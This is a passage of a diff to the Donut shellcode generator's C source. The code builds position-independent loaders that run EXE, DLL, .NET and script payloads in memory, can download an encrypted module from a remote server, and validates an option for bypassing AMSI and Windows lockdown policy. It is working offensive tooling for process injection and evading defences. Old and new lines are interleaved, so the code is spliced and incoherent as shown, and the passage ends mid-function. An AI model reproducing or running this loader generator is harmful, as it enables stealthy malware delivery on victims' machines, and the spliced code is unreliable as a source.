756 if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
757 return DONUT_ERROR_RANDOM;
758 }
759 DPRINT("Generated random name for module : %s", c->modname);
760
761 DPRINT("Setting URL parameters");
762 strcpy(inst->http.url, c->url);
982 if(inst->type == DONUT_INSTANCE_HTTP) {
983 // if no module name specified
984 if(c->modname[0] == 0) {
985 // if entropy disabled
986 if(c->entropy == DONUT_ENTROPY_NONE) {
987 // set to "AAAAAAAA"
988 memset(c->modname, 'A', DONUT_MAX_MODNAME);
989 } else {
990 // generate a random name for module
991 // that will be saved to disk
992 DPRINT("Generating random name for module");
993 if(!gen_random_string(c->modname, DONUT_MAX_MODNAME)) {
994 DPRINT("gen_random_string() failed");
995 err = DONUT_ERROR_RANDOM;
996 goto cleanup;
997 }
998 }
999 DPRINT("Name for module : %s", c->modname);
1000 }
1001 strcpy(inst->server, c->server);
7631002 // append module name
764 strcat(inst->http.url, c->modname);
1003 strcat(inst->server, c->modname);
7651004 // set the request verb
766 strcpy(inst->http.req, "GET");
767
768 DPRINT("Payload will attempt download from : %s", inst->http.url);
769 }
770
771 inst->mod_len = c->mod_len;
772 inst->len = inst_len;
773 c->inst = inst;
774 c->inst_len = inst_len;
775
776 #if !defined(NOCRYPTO)
777 if(c->inst_type == DONUT_INSTANCE_URL) {
778 DPRINT("encrypting module for download");
779
780 c->mod->mac = maru(inst->sig, inst->iv);
781
782 donut_encrypt(
783 mod_key.mk,
784 mod_key.ctr,
785 c->mod,
786 c->mod_len);
787 }
788 #endif
789 // if PIC, copy module to instance
790 if(inst->type == DONUT_INSTANCE_PIC) {
1005 strcpy(inst->http_req, "GET");
1006
1007 DPRINT("Loader will attempt to download module from : %s", inst->server);
1008
1009 // encrypt module?
1010 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1011 DPRINT("Encrypting module");
1012
1013 c->mod->mac = maru(inst->sig, inst->iv);
1014
1015 donut_encrypt(
1016 mod_key.mk,
1017 mod_key.ctr,
1018 c->mod,
1019 c->mod_len);
1020 }
1021 } else
1022 // if embedded, copy module to instance
1023 if(inst->type == DONUT_INSTANCE_EMBED) {
7911024 DPRINT("Copying module data to instance");
7921025 memcpy(&c->inst->module.x, c->mod, c->mod_len);
7931026 }
7941027
795 #if !defined(NOCRYPTO)
796 DPRINT("encrypting instance");
797
798 inst->mac = maru(inst->sig, inst->iv);
799
800 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
801
802 donut_encrypt(
803 inst_key.mk,
804 inst_key.ctr,
805 inst_data,
806 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
807 #endif
808 DPRINT("Leaving.");
809
810 return DONUT_ERROR_SUCCESS;
811 }
812
813 // given a configuration, create a PIC that will run from anywhere in memory
814 EXPORT_FUNC
815 int DonutCreate(PDONUT_CONFIG c) {
816 uint8_t *pl;
817 uint32_t t;
818 int url_len, err = DONUT_ERROR_SUCCESS;
819 FILE *fd;
820 file_info fi;
1028 // encrypt instance?
1029 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1030 DPRINT("Encrypting instance");
1031
1032 inst->mac = maru(inst->sig, inst->iv);
1033
1034 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
1035
1036 donut_encrypt(
1037 inst_key.mk,
1038 inst_key.ctr,
1039 inst_data,
1040 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
1041 }
1042 cleanup:
1043 // error? release memory for everything
1044 if(err != DONUT_ERROR_SUCCESS) {
1045 DPRINT("Releasing memory for module due to errors.");
1046 free(c->mod);
1047 }
1048 DPRINT("Leaving with error : %" PRId32, err);
1049 return err;
1050 }
1051
1052 /**
1053 * Function: save_file
1054 * ----------------------------
1055 * Creates a file and writes the contents of input buffer to it.
1056 *
1057 * INPUT : path = where to create file.
1058 * data = what to write to file.
1059 * len = length of data.
1060 *
1061 * OUTPUT : Donut error code.
1062 */
1063 static int save_file(const char *path, void *data, int len) {
1064 FILE *out;
1065 int err = DONUT_ERROR_SUCCESS;
8211066
8221067 DPRINT("Entering.");
823
824 DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);
825
826 if(c == NULL || c->file[0] == 0) {
827 return DONUT_ERROR_INVALID_PARAMETER;
828 }
829
830 c->mod = NULL;
831 c->mod_len = 0;
832
833 c->inst = NULL;
834 c->inst_len = 0;
835
836 c->pic = NULL;
837 c->pic_len = 0;
838
839 // instance not specified?
840 DPRINT("Validating instance type %" PRIx32 "", c->inst_type);
841
842 if(c->inst_type != DONUT_INSTANCE_PIC &&
843 c->inst_type != DONUT_INSTANCE_URL) {
844
845 return DONUT_ERROR_INVALID_PARAMETER;
846 }
847
848 if(c->inst_type == DONUT_INSTANCE_URL) {
849 DPRINT("Validating URL");
850
851 // no URL? exit
852 if(c->url[0] == 0) {
853 return DONUT_ERROR_INVALID_PARAMETER;
854 }
855 // doesn't begin with one of the following? exit
856 if((strnicmp(c->url, "http://", 7) != 0) &&
857 (strnicmp(c->url, "https://", 8) != 0)) {
858
859 return DONUT_ERROR_INVALID_URL;
860 }
861 // invalid length?
862 if(strlen(c->url) <= 8) {
863 return DONUT_ERROR_URL_LENGTH;
864 }
865 // ensure URL parameter and module name don't exceed DONUT_MAX_URL
866 url_len = strlen(c->url);
867
868 // if the end of string doesn't have a forward slash
869 // add one more to account for it
870 if(c->url[url_len - 1] != '/') {
871 strcat(c->url, "/");
872 url_len++;
873 }
874
875 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
876 return DONUT_ERROR_URL_LENGTH;
877 }
878 }
879
880 DPRINT("Validating architecture");
881
882 if(c->arch != DONUT_ARCH_X86 &&
883 c->arch != DONUT_ARCH_X64 &&
884 c->arch != DONUT_ARCH_X84 &&
885 c->arch != DONUT_ARCH_ANY)
886 {
887 return DONUT_ERROR_INVALID_ARCH;
888 }
889
890 DPRINT("Validating AMSI/WDLP bypass option");
891
892 if(c->bypass != DONUT_BYPASS_SKIP &&
893 c->bypass != DONUT_BYPASS_ABORT &&
894 c->bypass != DONUT_BYPASS_CONTINUE)
895 {
896 return DONUT_ERROR_BYPASS_INVALID;
897 }
898
899 // get file information
900 err = get_file_info(c->file, &fi);
901 if(err != DONUT_ERROR_SUCCESS) return err;
902
903 // Set the module type
904 c->mod_type = fi.type;
905
906 // Unmanaged EXE/DLL?
907 if(c->mod_type == DONUT_MODULE_DLL ||
908 c->mod_type == DONUT_MODULE_EXE)
909 {
910 DPRINT("Validating architecture %i for DLL/EXE %i",
911 c->arch, fi.arch);
912 // Requested shellcode is x86, but file is x64?
913 // Requested shellcode is x64, but file is x86?
914 if((c->arch == DONUT_ARCH_X86 &&
915 fi.arch == DONUT_ARCH_X64) ||
916 (c->arch == DONUT_ARCH_X64 &&
917 fi.arch == DONUT_ARCH_X86))
918 {
919 err = DONUT_ERROR_ARCH_MISMATCH;
920 goto cleanup;
921 }
922 // DLL function specified. Does it exist?
923 if(c->mod_type == DONUT_MODULE_DLL &&
924 c->method[0] != 0)
925 {
926 DPRINT("Validating DLL function \"%s\" for DLL", c->method);
927 if(!is_dll_export(&fi, c->method)) {
928 err = DONUT_ERROR_DLL_FUNCTION;
929 goto cleanup;
930 }
931 }
932 }
933 // .NET DLL assembly?
934 if(c->mod_type == DONUT_MODULE_NET_DLL) {
935 // DLL requires class and method
936 if(c->cls[0] == 0 || c->method[0] == 0) {
937 err = DONUT_ERROR_NET_PARAMS;
938 goto cleanup;
939 }
940 }
941
942 // is this an unmanaged DLL with parameters?
943 if(c->mod_type == DONUT_MODULE_DLL &&
944 c->param[0] != 0)
945 {
946 // we need a DLL function
947 if(c->method[0] == 0) {
948 err = DONUT_ERROR_DLL_PARAM;
949 goto cleanup;
950 }
951 }
952 // 1. Create the module
953 DPRINT("Creating module");
954 err = CreateModule(c, &fi);
955
956 if(err != DONUT_ERROR_SUCCESS)
957 goto cleanup;
958
959 // 2. Create the instance
960 DPRINT("Creating instance");
961 err = CreateInstance(c, &fi);
962
963 if(err != DONUT_ERROR_SUCCESS)
964 goto cleanup;
1068 out = fopen(path, "wb");
1069
1070 if(out != NULL) {
1071 DPRINT("Writing %d bytes of %p to %s", len, data, path);
1072 fwrite(data, 1, len, out);
1073 fclose(out);
1074 } else err = DONUT_ERROR_FILE_ACCESS;
1075
1076 DPRINT("Leaving with error : %" PRId32, err);
1077 return err;
1078 }
1079
1080 /**
1081 * Function: save_loader
1082 * ----------------------------
1083 * Saves the loader to output file. Also saves instance for debug builds.
1084 * If the instance type is HTTP, it saves the module to file.
1085 *
1086 * INPUT : Donut configuration.
1087 *
1088 * OUTPUT : Donut error code.
1089 */
1090 static int save_loader(PDONUT_CONFIG c) {
1091 int err = DONUT_ERROR_SUCCESS;
1092 FILE *fd;
9651093
9661094 // if DEBUG is defined, save instance to disk
9671095 #ifdef DEBUG
968 DPRINT("Saving instance to file");
969 fd = fopen("instance", "wb");
970
971 if(fd != NULL) {
972 fwrite(c->inst, 1, c->inst_len, fd);
973 fclose(fd);
974 }
1096 DPRINT("Saving instance %p to file. %" PRId32 " bytes.", c->inst, c->inst_len);
1097 save_file("instance", c->inst, c->inst_len);
9751098 #endif
976 // 3. If the module will be stored on a remote server
977 if(c->inst_type == DONUT_INSTANCE_URL) {
978 DPRINT("Saving %s to disk.", c->modname);
979 // save the module to disk using random name
980 fd = fopen(c->modname, "wb");
981
982 if(fd != NULL) {
983 fwrite(c->mod, 1, c->mod_len, fd);
984 fclose(fd);
985 }
986 }
987 // 4. calculate size of PIC + instance combined
1099
1100 // If the module will be stored on a remote server
1101 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1102 DPRINT("Saving %s to file.", c->modname);
1103 save_file(c->modname, c->mod, c->mod_len);
1104 }
1105
1106 // no output file specified?
1107 if(c->output[0] == 0) {
1108 // set to default name based on format
1109 switch(c->format) {
1110 case DONUT_FORMAT_BINARY:
1111 strncpy(c->output, "loader.bin", DONUT_MAX_NAME-1);
1112 break;
1113 case DONUT_FORMAT_BASE64:
1114 strncpy(c->output, "loader.b64", DONUT_MAX_NAME-1);
1115 break;
1116 case DONUT_FORMAT_RUBY:
1117 strncpy(c->output, "loader.rb", DONUT_MAX_NAME-1);
1118 break;
1119 case DONUT_FORMAT_C:
1120 strncpy(c->output, "loader.c", DONUT_MAX_NAME-1);
1121 break;
1122 case DONUT_FORMAT_PYTHON:
1123 strncpy(c->output, "loader.py", DONUT_MAX_NAME-1);
1124 break;
1125 case DONUT_FORMAT_POWERSHELL:
1126 strncpy(c->output, "loader.ps1", DONUT_MAX_NAME-1);
1127 break;
1128 case DONUT_FORMAT_CSHARP:
1129 strncpy(c->output, "loader.cs", DONUT_MAX_NAME-1);
1130 break;
1131 case DONUT_FORMAT_HEX:
1132 strncpy(c->output, "loader.hex", DONUT_MAX_NAME-1);
1133 break;
1134 }
1135 }
1136 // save loader to file
1137 fd = fopen(c->output, "wb");
1138 if(fd == NULL) {
1139 DPRINT("Opening %s failed.", c->output);
1140 return DONUT_ERROR_FILE_ACCESS;
1141 }
1142
1143 switch(c->format) {
1144 case DONUT_FORMAT_BINARY: {
1145 DPRINT("Saving loader as binary");
1146 fwrite(c->pic, 1, c->pic_len, fd);
1147 err = DONUT_ERROR_SUCCESS;
1148 break;
1149 }
1150 case DONUT_FORMAT_BASE64: {
1151 DPRINT("Saving loader as base64 string");
1152 err = base64_template(c->pic, c->pic_len, fd);
1153 break;
1154 }
1155 case DONUT_FORMAT_RUBY:
1156 case DONUT_FORMAT_C:
1157 DPRINT("Saving loader as C/Ruby string");
1158 err = c_ruby_template(c->pic, c->pic_len, fd);
1159 break;
1160 case DONUT_FORMAT_PYTHON:
1161 DPRINT("Saving loader as Python string");
1162 err = py_template(c->pic, c->pic_len, fd);
1163 break;
1164 case DONUT_FORMAT_POWERSHELL:
1165 DPRINT("Saving loader as Powershell string");
1166 err = powershell_template(c->pic, c->pic_len, fd);
1167 break;
1168 case DONUT_FORMAT_CSHARP:
1169 DPRINT("Saving loader as C# string");
1170 err = csharp_template(c->pic, c->pic_len, fd);
1171 break;
1172 case DONUT_FORMAT_HEX:
1173 DPRINT("Saving loader as Hex string");
1174 err = hex_template(c->pic, c->pic_len, fd);
1175 break;
1176 }
1177 fclose(fd);
1178 DPRINT("Leaving with error : %" PRId32, err);
1179 return err;
1180 }
1181
1182 /**
1183 * Function: build_loader
1184 * ----------------------------
1185 * Builds the shellcode that's injected into remote process.
1186 *
1187 * INPUT : Donut configuration.
1188 *
1189 * OUTPUT : Donut error code.
1190 */
1191 static int build_loader(PDONUT_CONFIG c) {
1192 uint8_t *pl;
1193 uint32_t t;
1194
1195 // target is x86?
9881196 if(c->arch == DONUT_ARCH_X86) {
989 c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
1197 c->pic_len = sizeof(LOADER_EXE_X86) + c->inst_len + 32;
9901198 } else
1199 // target is amd64?
9911200 if(c->arch == DONUT_ARCH_X64) {
992 c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
1201 c->pic_len = sizeof(LOADER_EXE_X64) + c->inst_len + 32;
9931202 } else
1203 // target can be both x86 and amd64?
9941204 if(c->arch == DONUT_ARCH_X84) {
995 c->pic_len = sizeof(PAYLOAD_EXE_X86) +
996 sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
997 }
998 // 5. allocate memory for shellcode
1205 c->pic_len = sizeof(LOADER_EXE_X86) +
1206 sizeof(LOADER_EXE_X64) + c->inst_len + 32;
1207 }
1208 // allocate memory for shellcode
9991209 c->pic = malloc(c->pic_len);
1000
1001 DPRINT("PIC size : %" PRIi64, c->pic_len);
1002
1210
10031211 if(c->pic == NULL) {
1004 err = DONUT_ERROR_NO_MEMORY;
1005 goto cleanup;
1212 DPRINT("Unable to allocate %" PRId32 " bytes of memory for loader.", c->pic_len);
1213 return DONUT_ERROR_NO_MEMORY;
10061214 }
10071215
10081216 DPRINT("Inserting opcodes");
1009 // 6. insert shellcode
1217
1218 // insert shellcode
10101219 pl = (uint8_t*)c->pic;
1220
10111221 // call $ + c->inst_len
10121222 PUT_BYTE(pl, 0xE8);
10131223 PUT_WORD(pl, c->inst_len);
10241234 // push edx
10251235 PUT_BYTE(pl, 0x52);
10261236
1027 DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
1028 (uint64_t)sizeof(PAYLOAD_EXE_X86));
1237 DPRINT("Copying %" PRIi32 " bytes of x86 shellcode",
1238 (uint32_t)sizeof(LOADER_EXE_X86));
10291239
1030 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1240 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
10311241 } else
10321242 // AMD64?
10331243 if(c->arch == DONUT_ARCH_X64) {
10341244
1035 DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
1036 (uint64_t)sizeof(PAYLOAD_EXE_X64));
1245 DPRINT("Copying %" PRIi32 " bytes of amd64 shellcode",
1246 (uint32_t)sizeof(LOADER_EXE_X64));
10371247
1038 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1248 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10391249 } else
10401250 // x86 + AMD64?
10411251 if(c->arch == DONUT_ARCH_X84) {
10421252
1043 DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
1044 (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));
1253 DPRINT("Copying %" PRIi32 " bytes of x86 + amd64 shellcode",
1254 (uint32_t)(sizeof(LOADER_EXE_X86) + sizeof(LOADER_EXE_X64)));
10451255
10461256 // xor eax, eax
10471257 PUT_BYTE(pl, 0x31);
10511261 // js dword x86_code
10521262 PUT_BYTE(pl, 0x0F);
10531263 PUT_BYTE(pl, 0x88);
1054 PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64));
1055 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1264 PUT_WORD(pl, sizeof(LOADER_EXE_X64));
1265 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10561266 // pop edx
10571267 PUT_BYTE(pl, 0x5A);
10581268 // push ecx
10591269 PUT_BYTE(pl, 0x51);
10601270 // push edx
10611271 PUT_BYTE(pl, 0x52);
1062 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1063 }
1064 cleanup:
1272 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
1273 }
1274 return DONUT_ERROR_SUCCESS;
1275 }
1276
1277 /**
1278 * Function: validate_loader_cfg
1279 * ----------------------------
1280 * Validates Donut configuration for loader.
1281 *
1282 * INPUT : Pointer to a Donut configuration.
1283 *
1284 * OUTPUT : Donut error code.
1285 */
1286 static int validate_loader_cfg(PDONUT_CONFIG c) {
1287 uint32_t url_len;
1288
1289 DPRINT("Validating loader configuration.");
1290
1291 if(c == NULL || c->input[0] == 0) {
1292 DPRINT("No configuration or input file provided.");
1293 return DONUT_ERROR_INVALID_PARAMETER;
1294 }
1295
1296 if(c->inst_type != DONUT_INSTANCE_EMBED &&
1297 c->inst_type != DONUT_INSTANCE_HTTP) {
1298
1299 DPRINT("Instance type %" PRIx32 " is invalid.", c->inst_type);
1300 return DONUT_ERROR_INVALID_PARAMETER;
1301 }
1302
1303 if(c->format < DONUT_FORMAT_BINARY || c->format > DONUT_FORMAT_HEX) {
1304 DPRINT("Format type %" PRId32 " is invalid.", c->format);
1305 return DONUT_ERROR_INVALID_FORMAT;
1306 }
1307
1308 #ifdef WINDOWS
1309 if(c->compress != DONUT_COMPRESS_NONE &&
1310 c->compress != DONUT_COMPRESS_APLIB &&
1311 c->compress != DONUT_COMPRESS_LZNT1 &&
1312 c->compress != DONUT_COMPRESS_XPRESS &&
1313 c->compress != DONUT_COMPRESS_XPRESS_HUFF)
1314 {
1315 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1316 return DONUT_ERROR_INVALID_ENGINE;
1317 }
1318 #else
1319 if(c->compress != DONUT_COMPRESS_NONE &&
1320 c->compress != DONUT_COMPRESS_APLIB)
1321 {
1322 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1323 return DONUT_ERROR_INVALID_ENGINE;
1324 }
1325 #endif
1326
1327 if(c->entropy != DONUT_ENTROPY_NONE &&
1328 c->entropy != DONUT_ENTROPY_RANDOM &&
1329 c->entropy != DONUT_ENTROPY_DEFAULT)
1330 {
1331 DPRINT("Entropy level " PRId32 " is invalid.", c->entropy);
1332 return DONUT_ERROR_INVALID_ENTROPY;
1333 }
1334
1335 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1336 // no URL? exit
1337 if(c->server[0] == 0) {
1338 DPRINT("Error: No HTTP server provided.");
1339 return DONUT_ERROR_INVALID_PARAMETER;
1340 }
1341 // doesn't begin with one of the following? exit
1342 if((strnicmp(c->server, "http://", 7) != 0) &&
1343 (strnicmp(c->server, "https://", 8) != 0)) {
1344
1345 DPRINT("URL is invalid : %s", c->server);
1346 return DONUT_ERROR_INVALID_URL;
1347 }
1348 // invalid length?
1349 url_len = (uint32_t)strlen(c->server);
1350
1351 if(url_len <= 8) {
1352 DPRINT("URL length : %" PRId32 " is invalid.", url_len);
1353 return DONUT_ERROR_URL_LENGTH;
1354 }
1355 // if the end of string doesn't have a forward slash
1356 // add one more to account for it
1357 if(c->server[url_len - 1] != '/') {
1358 c->server[url_len] = '/';
1359 url_len++;
1360 }
1361
1362 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_NAME) {
1363 DPRINT("URL length : %" PRId32 " exceeds size of buffer : %"PRId32,
1364 url_len+DONUT_MAX_MODNAME, DONUT_MAX_NAME);
1365 return DONUT_ERROR_URL_LENGTH;
1366 }
1367 }
1368
1369 if(c->arch != DONUT_ARCH_X86 &&
1370 c->arch != DONUT_ARCH_X64 &&
1371 c->arch != DONUT_ARCH_X84 &&
1372 c->arch != DONUT_ARCH_ANY)
1373 {
1374 DPRINT("Target architecture %"PRId32 " is invalid.", c->arch);
1375 return DONUT_ERROR_INVALID_ARCH;
1376 }
1377
1378 if(c->bypass != DONUT_BYPASS_NONE &&
1379 c->bypass != DONUT_BYPASS_ABORT &&
1380 c->bypass != DONUT_BYPASS_CONTINUE)
1381 {
1382 DPRINT("Option to bypass AMSI/WDLP %"PRId32" is invalid.", c->bypass);
1383 return DONUT_ERROR_BYPASS_INVALID;
1384 }
1385
1386 DPRINT("Loader configuration passed validation.");
1387 return DONUT_ERROR_SUCCESS;
1388 }
1389
1390 /**
1391 * Function: is_dll_export
1392 * ----------------------------
1393 * Validates if a DLL exports a function.
1394 *
1395 * INPUT : Name of DLL function to check.
1396 *
1397 * OUTPUT : 1 if found, else 0
1398 */
1399 static int is_dll_export(const char *function) {
1400 PIMAGE_DATA_DIRECTORY dir;
1401 PIMAGE_EXPORT_DIRECTORY exp;
1402 DWORD rva, cnt;
1403 ULONG64 ofs;
1404 PDWORD sym;
1405 PCHAR str;
1406 int found = 0;
1407
1408 DPRINT("Entering.");
1409
1410 dir = Dirs(fi.data);
1411 if(dir != NULL) {
1412 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
1413 DPRINT("EAT VA : %lx", rva);
1414 if(rva != 0) {
1415 ofs = rva2ofs(fi.data, rva);
1416 DPRINT("Offset = %" PRIX64 "\n", ofs);
1417 if(ofs != -1) {
1418 exp = (PIMAGE_EXPORT_DIRECTORY)(fi.data + ofs);
1419 cnt = exp->NumberOfNames;
1420 DPRINT("Number of exported functions : %lx", cnt);
1421
1422 if(cnt != 0) {
1423 sym = (PDWORD)(rva2ofs(fi.data, exp->AddressOfNames) + fi.data);
1424 // scan array for symbol
1425 do {
1426 str = (PCHAR)(rva2ofs(fi.data, sym[cnt - 1]) + fi.data);
1427 // if match found, exit
1428 if(strcmp(str, function) == 0) {
1429 DPRINT("Found API");
1430 found = 1;
1431 break;
1432 }
1433 } while (--cnt);
1434 }
1435 }
1436 }
1437 }
1438 DPRINT("Leaving.");
1439 return found;
1440 }
1441
1442 /**
1443 * Function: validate_file_cfg
1444 * ----------------------------
1445 * Validates configuration for the input file.
1446 *
1447 * INPUT : Pointer to Donut configuration.
1448 *
1449 * OUTPUT : Donut error code.
1450 */
1451 static int validate_file_cfg(PDONUT_CONFIG c) {
1452 DPRINT("Validating configuration for input file.");
1453
1454 // Unmanaged EXE/DLL?
1455 if(fi.type == DONUT_MODULE_DLL ||
1456 fi.type == DONUT_MODULE_EXE)
1457 {
1458 // Requested shellcode is x86, but file is x64?
1459 // Requested shellcode is x64, but file is x86?
1460 if((c->arch == DONUT_ARCH_X86 &&
1461 fi.arch == DONUT_ARCH_X64) ||
1462 (c->arch == DONUT_ARCH_X64 &&
1463 fi.arch == DONUT_ARCH_X86))
1464 {
1465 DPRINT("Target architecture %"PRId32 " is not compatible with DLL/EXE %"PRId32, c->arch, fi.arch);
1466 return DONUT_ERROR_ARCH_MISMATCH;
1467 }
1468 // DLL function specified. Does it exist?
1469 if(fi.type == DONUT_MODULE_DLL && c->method[0] != 0)
1470 {
1471 if(!is_dll_export(c->method)) {
1472 DPRINT("Unable to locate function \"%s\" in DLL", c->method);
1473 return DONUT_ERROR_DLL_FUNCTION;
1474 }
1475 }
1476 }
1477 // .NET DLL assembly?
1478 if(fi.type == DONUT_MODULE_NET_DLL) {
1479 // DLL requires class and method
1480 if(c->cls[0] == 0 || c->method[0] == 0) {
1481 DPRINT("Input file is a .NET assembly, but no class and method have been specified.");
1482 return DONUT_ERROR_NET_PARAMS;
1483 }
1484 }
1485
1486 // is this an unmanaged DLL with parameters?
1487 if(fi.type == DONUT_MODULE_DLL && c->param[0] != 0) {
1488 // we need a DLL function
1489 if(c->method[0] == 0) {
1490 DPRINT("Parameters are provided for an unmanaged/native DLL, but no function.");
1491 return DONUT_ERROR_DLL_PARAM;
1492 }
1493 }
1494 DPRINT("Validation passed.");
1495 return DONUT_ERROR_SUCCESS;
1496 }
1497
1498 /**
1499 * Function: DonutCreate
1500 * ----------------------------
1501 * Builds a position-independent loader for VBS/JS/EXE/DLL files.
1502 *
1503 * INPUT : Pointer to a Donut configuration.
1504 *
1505 * OUTPUT : Donut error code.
1506 */
1507 EXPORT_FUNC
1508 int DonutCreate(PDONUT_CONFIG c) {
1509 int err = DONUT_ERROR_SUCCESS;
1510
1511 DPRINT("Entering.");
1512
1513 c->mod = c->pic = c->inst = NULL;
1514 c->mod_len = c->pic_len = c->inst_len = 0;
1515
1516 // 1. validate the loader configuration
1517 err = validate_loader_cfg(c);
1518 if(err == DONUT_ERROR_SUCCESS) {
1519 // 2. get information about the file to execute in memory
1520 err = read_file_info(c);
1521 if(err == DONUT_ERROR_SUCCESS) {
1522 // 3. validate the module configuration
1523 err = validate_file_cfg(c);
1524 if(err == DONUT_ERROR_SUCCESS) {
1525 // 4. build the module
1526 err = build_module(c);
1527 if(err == DONUT_ERROR_SUCCESS) {
1528 // 5. build the instance
1529 err = build_instance(c);
1530 if(err == DONUT_ERROR_SUCCESS) {
1531 // 6. build the loader
1532 err = build_loader(c);
1533 if(err == DONUT_ERROR_SUCCESS) {
1534 // 7. save loader and any additional files to disk
1535 err = save_loader(c);
1536 }
1537 }
1538 }
1539 }
1540 }
1541 }
10651542 // if there was some error, release resources
10661543 if(err != DONUT_ERROR_SUCCESS) {
10671544 DonutDelete(c);
10681545 }
1069 unmap_file(&fi);
1070 DPRINT("Leaving.");
1546 DPRINT("Leaving with error : %" PRId32, err);
10711547 return err;
10721548 }
10731549
1074 // release resources allocated for configuration
1550 /**
1551 * Function: DonutDelete
1552 * ----------------------------
1553 * Releases memory allocated by internal Donut functions.
1554 *
1555 * INPUT : Pointer to a Donut configuration previously used by DonutCreate.
1556 *
1557 * OUTPUT : Donut error code.
1558 */
10751559 EXPORT_FUNC
10761560 int DonutDelete(PDONUT_CONFIG c) {
10771561
10811565 }
10821566 // free module
10831567 if(c->mod != NULL) {
1568 DPRINT("Releasing memory for module.");
10841569 free(c->mod);
10851570 c->mod = NULL;
10861571 }
10871572 // free instance
10881573 if(c->inst != NULL) {
1574 DPRINT("Releasing memory for configuration.");
10891575 free(c->inst);
10901576 c->inst = NULL;
10911577 }
1092 // free payload
1578 // free loader
10931579 if(c->pic != NULL) {
1580 DPRINT("Releasing memory for loader.");
10941581 free(c->pic);
10951582 c->pic = NULL;
10961583 }
1584 unmap_file();
1585
10971586 DPRINT("Leaving.");
10981587 return DONUT_ERROR_SUCCESS;
10991588 }
11001589
1101 // define when building an executable
1102 #ifdef DONUT_EXE
1103
1104 const char *err2str(int err) {
1590 /**
1591 * Function: DonutError
1592 * ----------------------------
1593 * Converts Donut error code into a string
1594 *
1595 * INPUT : error code returned by DonutCreate
1596 *
1597 * OUTPUT : error code as a string
1598 */
1599 EXPORT_FUNC
1600 const char *DonutError(int err) {
11051601 static const char *str="N/A";
11061602
11071603 switch(err) {
11081604 case DONUT_ERROR_SUCCESS:
1109 str = "No error";
1605 str = "No error.";
11101606 break;
11111607 case DONUT_ERROR_FILE_NOT_FOUND:
1112 str = "File not found";
1608 str = "File not found.";
11131609 break;
11141610 case DONUT_ERROR_FILE_EMPTY:
1115 str = "File is empty";
1611 str = "File is empty.";
11161612 break;
11171613 case DONUT_ERROR_FILE_ACCESS:
1118 str = "Cannot open file";
1614 str = "Cannot open file.";
11191615 break;
11201616 case DONUT_ERROR_FILE_INVALID:
1121 str = "File is invalid";
1617 str = "File is invalid.";
11221618 break;
11231619 case DONUT_ERROR_NET_PARAMS:
1124 str = "File is a .NET DLL. Donut requires a class and method";
1620 str = "File is a .NET DLL. Donut requires a class and method.";
11251621 break;
11261622 case DONUT_ERROR_NO_MEMORY:
1127 str = "No memory available";
1623 str = "Memory allocation failed.";
11281624 break;
11291625 case DONUT_ERROR_INVALID_ARCH:
1130 str = "Invalid architecture specified";
1626 str = "Invalid architecture specified.";
11311627 break;
11321628 case DONUT_ERROR_INVALID_URL:
1133 str = "Invalid URL";
1629 str = "Invalid URL.";
11341630 break;
11351631 case DONUT_ERROR_URL_LENGTH:
1136 str = "Invalid URL length";
1632 str = "Invalid URL length.";
11371633 break;
11381634 case DONUT_ERROR_INVALID_PARAMETER:
1139 str = "Invalid parameter";
1635 str = "Invalid parameter.";
11401636 break;
11411637 case DONUT_ERROR_RANDOM:
1142 str = "Error generating random values";
1638 str = "Error generating random values.";
11431639 break;
11441640 case DONUT_ERROR_DLL_FUNCTION:
1145 str = "Unable to locate DLL function provided. Names are case sensitive";
1641 str = "Unable to locate DLL function provided. Names are case sensitive.";
11461642 break;
11471643 case DONUT_ERROR_ARCH_MISMATCH:
1148 str = "Target architecture cannot support selected DLL/EXE file";
1644 str = "Target architecture cannot support selected DLL/EXE file.";
11491645 break;
11501646 case DONUT_ERROR_DLL_PARAM:
1151 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function";
1647 str = "You've supplied parameters for an unmanaged DLL. Donut also requires a DLL function.";
11521648 break;
11531649 case DONUT_ERROR_BYPASS_INVALID:
1154 str = "Invalid bypass option specified";
1155 break;
1156 }
1650 str = "Invalid bypass option specified.";
1651 break;
1652 case DONUT_ERROR_NORELOC:
1653 str = "This file has no relocation information required for in-memory execution.";
1654 break;
1655 case DONUT_ERROR_INVALID_FORMAT:
1656 str = "The output format is invalid.";
1657 break;
1658 case DONUT_ERROR_INVALID_ENGINE:
1659 str = "The compression engine is invalid.";
1660 break;
1661 case DONUT_ERROR_COMPRESSION:
